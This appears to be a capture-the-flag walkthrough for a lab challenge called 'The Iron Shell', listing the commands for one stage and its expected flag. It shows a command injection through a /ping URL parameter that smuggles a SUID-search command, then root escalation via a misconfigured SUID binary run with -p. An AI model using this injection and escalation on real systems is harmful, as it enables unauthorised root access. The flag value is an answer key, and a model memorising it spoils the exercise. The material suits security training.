The Iron Shell - TOKEN3

Base URL: http://target:8000

Background

A misconfigured SUID binary (/usr/local/bin/rootme) allows privilege escalation to root.

From Nothing to Working

Start point: you have user-level access after cracking SSH credentials.

Iterations:

1. From the /ping injection, run find / -perm -4000 -type f to list SUID binaries.
2. Notice /usr/local/bin/rootme is SUID root.
3. Execute rootme with preserved privileges (-p) to obtain a root shell.
4. Read the root flag and capture the token.

Goal

Gain root access and retrieve the root flag.

Commands

Find SUID targets (from the web injection):

curl -s "http://target:8000/ping?ip=127.0.0.1;find+/+-perm+-4000+-type+f"

Escalate after SSH login:

ssh user@target
/usr/local/bin/rootme -p
cat /root/flag3.txt

Expected Output

Look for:

PCCC{flag3_41_6572}

Learn More

• https://owasp.org/www-community/attacks/Privilege_Escalation
• https://cwe.mitre.org/data/definitions/250.html